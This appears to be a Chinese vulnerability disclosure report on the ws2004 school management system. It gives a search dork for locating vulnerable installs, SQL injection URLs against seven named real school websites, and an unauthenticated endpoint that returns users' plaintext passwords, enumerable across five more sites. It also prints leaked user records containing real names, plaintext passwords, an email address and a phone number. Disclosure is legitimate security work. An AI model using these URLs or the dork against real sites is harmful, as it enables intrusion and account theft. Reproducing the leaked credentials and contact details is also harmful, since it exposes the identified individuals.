### 简要描述: 漏洞打包 ### 详细说明: 百度搜索:inurl:ws2004 技术支持:南京苏亚星资讯科技开发有限公司 这里打包吧,不再一一提交。 ---------------- 0x01: SQL注入漏洞 漏洞页面:ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID= 漏洞参数:ID 漏洞证明: 1# http://www.sdwhys.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg" alt="QQ图片20150106221416.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg) [<img src="https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg" alt="QQ图片20150106221511.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg) 2# http://www.sgtjb.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152555fbfee37b9e3e65dbd18e5cb4125960aa.jpg" alt="QQ图片20150106221603.jpg" width="600"...
### 简要描述: 漏洞打包 ### 详细说明: 百度搜索:inurl:ws2004 技术支持:南京苏亚星资讯科技开发有限公司 这里打包吧,不再一一提交。 ---------------- 0x01: SQL注入漏洞 漏洞页面:ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID= 漏洞参数:ID 漏洞证明: 1# http://www.sdwhys.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg" alt="QQ图片20150106221416.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg) [<img src="https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg" alt="QQ图片20150106221511.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg) 2# http://www.sgtjb.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152555fbfee37b9e3e65dbd18e5cb4125960aa.jpg" alt="QQ图片20150106221603.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152555fbfee37b9e3e65dbd18e5cb4125960aa.jpg) [<img src="https://images.seebug.org/upload/201501/14152609c6038a7e4267eb607fcc15fb33e20fcf.jpg" alt="QQ图片20150106221635.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152609c6038a7e4267eb607fcc15fb33e20fcf.jpg) 3# http://www.fzjcxx.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152625c275e9ce594f3069e5a29e34d0b08830.jpg" alt="QQ图片20150106221740.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152625c275e9ce594f3069e5a29e34d0b08830.jpg) [<img src="https://images.seebug.org/upload/201501/141526358f1fb8eae0027e94b6ba93613af1d2c6.jpg" alt="QQ图片20150106221759.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/141526358f1fb8eae0027e94b6ba93613af1d2c6.jpg) 4# http://www.wuai.lwedu.sh.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/1415272612986694aca73173f7244c209c60f9f5.jpg" alt="QQ图片20150106221945.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1415272612986694aca73173f7244c209c60f9f5.jpg) [<img src="https://images.seebug.org/upload/201501/1415273848046e17a6d7087e9aa7a54bc999053e.jpg" alt="QQ图片20150106222012.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1415273848046e17a6d7087e9aa7a54bc999053e.jpg) 5# http://www.yzsx.net.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/141528239c76a84c52a2512fdb9b65784c5ffe88.jpg" alt="QQ图片20150106222104.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/141528239c76a84c52a2512fdb9b65784c5ffe88.jpg) [<img src="https://images.seebug.org/upload/201501/14152835f60cf673fefe5196961b677fcf56ed3c.jpg" alt="QQ图片20150106222138.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152835f60cf673fefe5196961b677fcf56ed3c.jpg) 6# http://www.sndsx.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14153010dbf3c4ec09bf3728870ff508d539dc90.jpg" alt="QQ图片20150106222306.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14153010dbf3c4ec09bf3728870ff508d539dc90.jpg) [<img src="https://images.seebug.org/upload/201501/141530272ae85c0b1bec5f31d2d606d0db11f8ac.jpg" alt="QQ图片20150106222332.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/141530272ae85c0b1bec5f31d2d606d0db11f8ac.jpg) 7# http://www.yygy.net/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14153037aa8101b4ae39ae8c74466a3b93d46d93.jpg" alt="QQ图片20150106222500.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14153037aa8101b4ae39ae8c74466a3b93d46d93.jpg) [<img src="https://images.seebug.org/upload/201501/14153045d5c590b0fd078582b091167d8d15a2c7.jpg" alt="QQ图片20150106222526.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14153045d5c590b0fd078582b091167d8d15a2c7.jpg) 0x02:获取任意注册用户的明文密码 说明:与 [WooYun: 某校园管理系统设计缺陷导致获取任意管理员明文密码(无需登录)](http://www.wooyun.org/bugs/wooyun-2015-090403) 漏洞类似,但并非同一个点。这里是获取注册用户信息及密码,可遍历。直接打开链接为空白,可“查看源码”看到信息 1# http://www.cgyz.net.cn/ws2004/ http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=56 ``` <?xml version="1.0" encoding="GB2312"?> <DataListAll><DataList><UserName><![CDATA[xuan]]></UserName><RealName><![CDATA[王萱]]></RealName><PassWords><![CDATA[120428]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[]]></Telephone><City><![CDATA[]]></City><Province><![CDATA[]]></Province><Country><![CDATA[]]></Country></DataList></DataListAll> ``` http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=40 http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=49 …… 2# http://www.eedsyz.cn/ws2004/ http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39 ``` <?xml version="1.0" encoding="GB2312"?> <DataListAll><DataList><UserName><![CDATA[真如本性]]></UserName><RealName><![CDATA[刘真如]]></RealName><PassWords><![CDATA[liuzhenru*()21]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[1179926121@qq.com]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[15304776395]]></Telephone><City><![CDATA[东胜区]]></City><Province><![CDATA[内蒙古自治区]]></Province><Country><![CDATA[中华人民共和国]]></Country></DataList></DataListAll> ``` http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=46 http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=50 …… 3# http://www.sndsx.com/ws2004/ http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=24 http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=25 http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=62 …… 4# http://www.wzzx.net.cn/ws2004/ http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=11 http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39 http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=22 …… 5# http://www.hwsyxx.com/ws2004/ http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=67 http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=83 http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=71 …… ### 漏洞证明:
